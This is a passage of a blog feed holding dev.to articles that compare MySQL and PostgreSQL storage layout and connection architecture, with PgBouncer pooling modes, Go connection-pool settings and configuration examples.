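autovacuum_vacuum_cost_limit = 1000    # default -1 (falls back to vacuum_cost_limit): let workers do more per cycle
```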

&lt;h2&gt;
  
  
  4. Key Takeaways: Side-by-Side Comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;MySQL (Clustered Index)&lt;/th&gt;
&lt;th&gt;PostgreSQL (Heap Storage)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Data Organization&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Physically ordered by primary key&lt;/td&gt;
&lt;td&gt;Unordered heap storage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Key Lookup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Single step (direct access)&lt;/td&gt;
&lt;td&gt;Two steps (index + heap)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Secondary Index Lookup&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Two steps (index → PK → data)&lt;/td&gt;
&lt;td&gt;Single step (index → heap)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Insert Performance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sequential fast, random slow&lt;/td&gt;
&lt;td&gt;Consistent regardless of pattern&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range Query Performance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Excellent on primary key&lt;/td&gt;
&lt;td&gt;Good on any indexed column&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Storage Space&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;More efficient (data in index)&lt;/td&gt;
&lt;td&gt;Larger (separate index + heap)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Update Overhead&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Only affected indexes updated&lt;/td&gt;
&lt;td&gt;All indexes must be updated (except HOT updates)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Key Choice&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Critical (affects all indexes)&lt;/td&gt;
&lt;td&gt;Less critical (just another index)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;MVCC Implementation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Undo log (separate from table)&lt;/td&gt;
&lt;td&gt;Tuple versioning (in table)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Maintenance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic purge&lt;/td&gt;
&lt;td&gt;Requires VACUUM tuning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best For&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Primary key access, range queries&lt;/td&gt;
&lt;td&gt;Flexible access patterns, heavy writes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MySQL's clustered index architecture&lt;/strong&gt; is optimized for primary key access and provides excellent performance for sequential inserts and primary key range queries, but requires careful primary key design and suffers with random inserts.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL's heap storage&lt;/strong&gt; provides consistent insert performance and flexible access patterns, but requires all indexes to be updated on row changes (except for HOT updates) and needs proper VACUUM maintenance to prevent bloat.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Choose based on your access patterns, primary key characteristics, and operational requirements.&lt;/p&gt;

</description>
      <category>postgres</category>
      <category>mysql</category>
      <category>database</category>
      <category>webdev</category>
    </item>
    <item>
      <title>Part 1 - MySQL vs PostgreSQL: Connection Architecture</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Tue, 14 Oct 2025 09:48:17 +0000</pubDate>
      <link>https://dev.to/harry_do/part-1-mysql-vs-postgresql-connection-architecture-1nk9</link>
      <guid>https://dev.to/harry_do/part-1-mysql-vs-postgresql-connection-architecture-1nk9</guid>
      <description>&lt;h1&gt;
  
  
  Part 1 - MySQL vs PostgreSQL: Connection Architecture
&lt;/h1&gt;

&lt;p&gt;MySQL and PostgreSQL take fundamentally different approaches to handling client connections. MySQL uses a thread-based architecture where all connections share a single process, while PostgreSQL uses a process-based architecture where each connection gets its own dedicated process. This architectural difference has cascading effects on memory usage, connection scalability, and performance characteristics, and it explains why connection pooling is optional for MySQL but essential for PostgreSQL in production environments.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. MySQL: The Thread-Based Approach
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn5hlngih91rppmgykbg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhn5hlngih91rppmgykbg.png" alt=" " width="800" height="435"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference: &lt;a href="https://dev.mysql.com/blog-archive/the-new-mysql-thread-pool/" rel="noopener noreferrer"&gt;https://dev.mysql.com/blog-archive/the-new-mysql-thread-pool/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;MySQL uses a single process with multiple threads to handle all connections. Think of it like one big house where everyone shares the same kitchen, living room, and resources. Because all threads live in the same address space, it's memory efficient, and a single server can handle thousands of connections.&lt;br&gt;
Here's how MySQL handles things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The Flow:&lt;/strong&gt; When clients (your app, CLI tools, or any API using the MySQL client-server protocol) send connection requests to MySQL, the system follows a sophisticated thread pooling mechanism:

&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;Receiver Thread&lt;/strong&gt; acts as the gatekeeper, queuing up incoming connections and managing the initial handshake process&lt;/li&gt;
&lt;li&gt;It processes them one by one, assigning each to a &lt;strong&gt;Thread Group&lt;/strong&gt; in round-robin fashion to ensure balanced load distribution across available worker threads&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Query Worker Threads&lt;/strong&gt; inside that Thread Group actually execute your queries, handling everything from parsing to execution&lt;/li&gt;
&lt;li&gt;Each connection gets its own &lt;strong&gt;THD&lt;/strong&gt; (a thread context data structure that tracks connection state, session variables, transaction state, and query metadata)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;One Big Process:&lt;/strong&gt; There's a single main &lt;code&gt;mysqld&lt;/code&gt; process running everything, which means all database operations, from query execution to buffer management, happen within this unified process space&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Threads Everywhere:&lt;/strong&gt; Each connection is just a thread in that process, making connection creation extremely lightweight since it doesn't require forking new processes or copying memory spaces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared Memory:&lt;/strong&gt; All threads hang out in the same memory space and share resources like the buffer pool and table metadata (and, before MySQL 8.0, the query cache), enabling efficient resource utilization&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory Friendly:&lt;/strong&gt; Threads share memory, so you can have thousands of connections without breaking the bank&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lightning Fast Connections:&lt;/strong&gt; Creating a thread is super quick&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared Cache Benefits:&lt;/strong&gt; Everyone gets to use the same buffer pool and cache&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Works on Tight Budgets:&lt;/strong&gt; Perfect when you don't have tons of RAM&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Handles the Crowd:&lt;/strong&gt; Great for dealing with lots of concurrent connections&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;All Eggs in One Basket:&lt;/strong&gt; If the main process goes down, everything dies&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Not Much Separation:&lt;/strong&gt; One bad connection can mess with the others&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared Memory Risks:&lt;/strong&gt; If memory gets corrupted, it affects everyone&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Less Protection:&lt;/strong&gt; Threads aren't as isolated as separate processes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Thread Contention:&lt;/strong&gt; Under heavy load, thread synchronization overhead can impact performance&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  2. PostgreSQL: The Process-Based Approach
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuphpz1vsernxk0pwa59q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuphpz1vsernxk0pwa59q.png" alt=" " width="720" height="720"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reference&lt;/strong&gt;: &lt;a href="https://medium.com/@hnasr/postgresql-process-architecture-f21e16459907" rel="noopener noreferrer"&gt;https://medium.com/@hnasr/postgresql-process-architecture-f21e16459907&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;PostgreSQL takes a completely different approach: it uses a separate process for each connection. Think of it like a neighborhood where each family has their own house with their own resources. Each connection is completely isolated from the others, which provides better stability and security, but it comes at the cost of higher memory usage since each process needs its own space.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;The Flow:&lt;/strong&gt; When a client connects to PostgreSQL, the system follows a fork-based process creation model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;Postmaster&lt;/strong&gt; (main supervisor process) listens for incoming connections on the configured port (default 5432) and acts as the primary coordinator for all database activity&lt;/li&gt;
&lt;li&gt;When a request arrives, Postmaster authenticates it by validating credentials and checking access permissions before allowing the connection to proceed&lt;/li&gt;
&lt;li&gt;Once authenticated, it uses the Unix &lt;code&gt;fork()&lt;/code&gt; system call to create a brand new &lt;strong&gt;Backend Process&lt;/strong&gt; dedicated exclusively to that connection, complete with its own memory space and execution context&lt;/li&gt;
&lt;li&gt;This Backend Process handles all queries from that client until disconnect, maintaining session state, transaction context, and query execution buffers independently from all other connections&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Memory Architecture:&lt;/strong&gt; PostgreSQL's memory model is divided into two distinct areas to balance isolation with efficiency:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Private Memory:&lt;/strong&gt; Each Backend Process gets its own isolated memory space (~2-5MB base, can grow based on workload) for query execution, session state, temporary tables, sort operations, and connection-specific buffers, ensuring complete isolation from other connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared Memory:&lt;/strong&gt; All processes share a common area for caching data pages (shared_buffers), Write-Ahead Log (WAL) buffers, lock tables, and coordination structures, allowing efficient data sharing while maintaining process isolation&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Background Processes:&lt;/strong&gt; PostgreSQL also runs essential helper processes like WAL Writer (for transaction logging), Checkpointer (for flushing dirty buffers), Autovacuum Workers (for cleaning up dead tuples), and Stats Collector (for gathering query statistics) to keep things running smoothly without impacting user connections&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Good Stuff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total Isolation:&lt;/strong&gt; Each connection is its own thing, completely separate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;More Stable:&lt;/strong&gt; If one process crashes, the others keep chugging along&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Protected Memory:&lt;/strong&gt; Each process has its own memory sandbox&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Extra Security:&lt;/strong&gt; OS-level process isolation is pretty solid&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The Not-So-Good:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory Hog:&lt;/strong&gt; Each process uses ~2-5MB base memory per connection, which can grow based on workload complexity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Slower Startup:&lt;/strong&gt; Forking a new process takes longer than spinning up a thread&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Connection Limits:&lt;/strong&gt; Can't handle as many connections at once&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory Gets Messy:&lt;/strong&gt; As processes grow, memory gets fragmented&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Needs Connection Pooling:&lt;/strong&gt; Pretty much required for production (more on this below)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;IPC Overhead:&lt;/strong&gt; Inter-process communication is slower than inter-thread communication&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;
  
  
  3. Connection Pooling: Why PostgreSQL Really Needs It
&lt;/h2&gt;

&lt;p&gt;Here's the deal: Because of how PostgreSQL is built, you basically &lt;em&gt;have&lt;/em&gt; to use connection pooling in production. MySQL can handle more direct connections than PostgreSQL thanks to its thread-based architecture, but connection pooling is still highly recommended for production environments to minimize connection overhead (authentication, handshake costs) and improve overall performance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why PostgreSQL Is Basically Begging for Connection Pooling:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Memory Gets Expensive:&lt;/strong&gt; Each connection = 1 whole OS process using ~2-5MB base memory (can grow with workload)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Slow Connections:&lt;/strong&gt; Forking processes is way slower than spinning up threads&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;You'll Hit a Wall:&lt;/strong&gt; You're limited by how much memory you have and how many processes your system allows&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory Gets Wasted:&lt;/strong&gt; Over time, memory gets fragmented and inefficient&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Two Ways to Pool: Proxy vs Application-Level&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Let me break down the two main approaches:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Application-level pooling&lt;/strong&gt; is baked right into your app's code. You use a library or framework feature that creates and manages a pool of connections when your app starts up. It's like having your own personal stash of database connections.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;sqlDB&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DB&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="c"&gt;// SetMaxIdleConns sets the maximum number of connections in the idle connection pool.&lt;/span&gt;
&lt;span class="n"&gt;sqlDB&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SetMaxIdleConns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;// SetMaxOpenConns sets the maximum number of open connections to the database.&lt;/span&gt;
&lt;span class="n"&gt;sqlDB&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SetMaxOpenConns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;100&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;// SetConnMaxLifetime sets the maximum amount of time a connection may be reused.&lt;/span&gt;
&lt;span class="n"&gt;sqlDB&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SetConnMaxLifetime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Hour&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On the other hand, &lt;strong&gt;Proxy-level pooling&lt;/strong&gt; is like having a middleman. You set up a separate service (like PgBouncer) that sits between your app and the database. Your app talks to the proxy, and the proxy manages a pool of real database connections. When you need to do something, the proxy hands you a connection that's already warmed up and ready to go.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftmdh7q0aybqletwonqoq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftmdh7q0aybqletwonqoq.png" alt=" " width="800" height="303"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Proxy Pool Modes:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Session Mode:&lt;/strong&gt; Safest and most compatible option that supports all PostgreSQL features including prepared statements, cursors, advisory locks, and session-level settings - a client connection is mapped to a server connection for the entire session duration, just like connecting directly to PostgreSQL&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transaction Mode:&lt;/strong&gt; Recommended for most web applications and REST APIs because it releases the server connection back to the pool after each transaction commits or rolls back, providing excellent connection reuse while supporting most common use cases (note: older PgBouncer versions don't support prepared statements in this mode, but PgBouncer 1.21.0+ added support via max_prepared_statements parameter; still doesn't support cursors or session-level features across transactions)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Statement Mode:&lt;/strong&gt; Highest throughput and most aggressive pooling that returns connections to the pool after every single SQL statement, maximizing connection reuse but with significant restrictions - doesn't support multi-statement transactions, prepared statements, or any session state, making it suitable only for very specific simple read-only workloads&lt;/li&gt;
&lt;/ul&gt;
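
&lt;p&gt;As a rough illustration, the mode is selected via &lt;code&gt;pool_mode&lt;/code&gt; in &lt;code&gt;pgbouncer.ini&lt;/code&gt; (the host, port, and pool sizes below are placeholder values, not recommendations):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[databases]
; clients connect to "appdb" on PgBouncer, which forwards to the real server
appdb = host=10.0.0.5 port=5432 dbname=appdb

[pgbouncer]
listen_port = 6432
pool_mode = transaction      ; session | transaction | statement
default_pool_size = 20       ; server connections per user/database pair
max_client_conn = 1000       ; client connections PgBouncer will accept
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;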

&lt;p&gt;&lt;strong&gt;Comparison between the two approaches&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;Proxy-Level (PgBouncer)&lt;/th&gt;
&lt;th&gt;Application-Level (GORM)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Where It Lives&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Between app and database&lt;/td&gt;
&lt;td&gt;Inside your application&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Who It Helps&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;All your applications&lt;/td&gt;
&lt;td&gt;Just one application&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;How You Set It Up&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;One central config&lt;/td&gt;
&lt;td&gt;Configure each app&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory Cost&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Barely touches your app&lt;/td&gt;
&lt;td&gt;Uses your app's memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Connection Control&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Controls everything globally&lt;/td&gt;
&lt;td&gt;Each app sets its own limits&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;When Things Break&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Built-in failover&lt;/td&gt;
&lt;td&gt;You handle it yourself&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Watching Metrics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;See everything in one place&lt;/td&gt;
&lt;td&gt;Per-app metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;How You Deploy It&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Separate service to run&lt;/td&gt;
&lt;td&gt;Just part of your app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;The Smart Move: Use Both&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Honestly? Do both for maximum efficiency and reliability:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use &lt;strong&gt;PgBouncer&lt;/strong&gt; to manage connections globally across all your services, providing a centralized connection pool that prevents any single application from overwhelming the database and allows you to monitor and control all database access from one place&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;GORM&lt;/strong&gt; (or whatever your framework offers) for app-specific tuning, allowing each application to optimize its connection behavior based on its specific workload patterns, request rate, and performance requirements without affecting other services&lt;/li&gt;
&lt;li&gt;This layered approach gives you redundancy and flexibility—best of both worlds—where PgBouncer provides the critical last line of defense against connection exhaustion while application-level pools optimize for each service's unique needs and can fail gracefully if PgBouncer encounters issues&lt;/li&gt;
&lt;/ul&gt;
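
&lt;p&gt;To make the sizing concrete, here's a small Go sketch (the helper name and the 20% headroom are my own illustration, not part of PgBouncer or GORM) that splits a global PgBouncer server-connection budget across services, giving each app a number to pass to &lt;code&gt;SetMaxOpenConns&lt;/code&gt;:&lt;/p&gt;

```go
package main

import "fmt"

// perAppMaxConns is a hypothetical sizing helper: given PgBouncer's global
// server-connection budget, reserve some headroom for admin tools and spikes,
// then split the rest evenly across services. Real deployments usually weight
// the split by each service's actual load instead of dividing evenly.
func perAppMaxConns(globalLimit, numServices int, headroom float64) int {
	usable := int(float64(globalLimit) * headroom)
	return usable / numServices
}

func main() {
	// e.g. PgBouncer allows 200 server connections, 4 services, keep 20% spare:
	// each app would call sqlDB.SetMaxOpenConns with this value
	fmt.Println(perAppMaxConns(200, 4, 0.8)) // prints 40
}
```

&lt;p&gt;The point of the sketch: the sum of every app's &lt;code&gt;SetMaxOpenConns&lt;/code&gt; should stay under PgBouncer's global limit, so no single service can starve the others.&lt;/p&gt;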

&lt;h2&gt;
  
  
  4. Key Takeaways: Side-by-Side Comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;MySQL (Thread-Based)&lt;/th&gt;
&lt;th&gt;PostgreSQL (Process-Based)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Memory per Connection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Very low (threads share memory)&lt;/td&gt;
&lt;td&gt;High (each process needs own memory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Max Connections&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Very high with thread pool&lt;/td&gt;
&lt;td&gt;Limited without pooling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Connection Speed&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fast (thread creation)&lt;/td&gt;
&lt;td&gt;Slower (process forking)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Connection Pooling&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Recommended (handles direct connections better)&lt;/td&gt;
&lt;td&gt;Required in production&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Crash Impact&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Entire server goes down&lt;/td&gt;
&lt;td&gt;Only affected connection fails&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Process Isolation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Shared memory (lower isolation)&lt;/td&gt;
&lt;td&gt;OS-level (strong isolation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best For&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;High connection count, simple queries, serverless&lt;/td&gt;
&lt;td&gt;Complex queries, write-heavy, advanced features&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Infrastructure&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Simple, works out-of-the-box&lt;/td&gt;
&lt;td&gt;Needs PgBouncer/PgPool setup&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Bottom Line:&lt;/strong&gt; MySQL's thread model is more forgiving and handles high connection counts easily. PostgreSQL's process model provides better isolation but requires connection pooling in production. Both are excellent databases—choose based on your connection patterns and operational requirements.&lt;/p&gt;

</description>
      <category>postgres</category>
      <category>mysql</category>
      <category>database</category>
      <category>webdev</category>
    </item>
    <item>
      <title>MySQL vs PostgreSQL: Understanding the differences</title>
      <dc:creator>Harry Do</dc:creator>
      <pubDate>Tue, 14 Oct 2025 09:47:24 +0000</pubDate>
      <link>https://dev.to/harry_do/mysql-vs-postgresql-understanding-the-differences-167k</link>
      <guid>https://dev.to/harry_do/mysql-vs-postgresql-understanding-the-differences-167k</guid>
      <description>&lt;h2&gt;
  
  
  My Story
&lt;/h2&gt;

&lt;p&gt;I spent most of my career working with PostgreSQL. Then I joined a new company that uses MySQL, and I realized a lot of things in MySQL work... differently.&lt;/p&gt;

&lt;p&gt;At first, I assumed these were just surface-level differences - different syntax, different commands. But as I dug deeper, I discovered something more interesting: these databases make fundamentally different architectural choices. How they handle connections, organize data on disk, manage concurrent updates, enforce data integrity — there are deliberate trade-offs at each level.&lt;/p&gt;

&lt;p&gt;Understanding these differences transformed how I work with both databases. It helped me avoid performance pitfalls, write better queries, and make more informed architectural decisions. More importantly, it helped me understand that the question isn't "which database is better?" — it's "which trade-offs matter for my use case?"&lt;/p&gt;

&lt;p&gt;That's why I'm writing this series to share what I learned and help you understand how these databases really work under the hood.&lt;/p&gt;




&lt;h2&gt;
  
  
  What We're Comparing
&lt;/h2&gt;

&lt;p&gt;We'll be comparing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;MySQL (InnoDB storage engine)&lt;/strong&gt;: Version 8.4.x&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL&lt;/strong&gt;: Version 17.x&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Why InnoDB specifically? Because it's the default and most widely-used storage engine in MySQL. When people talk about MySQL in production, they're almost always talking about InnoDB.&lt;/p&gt;




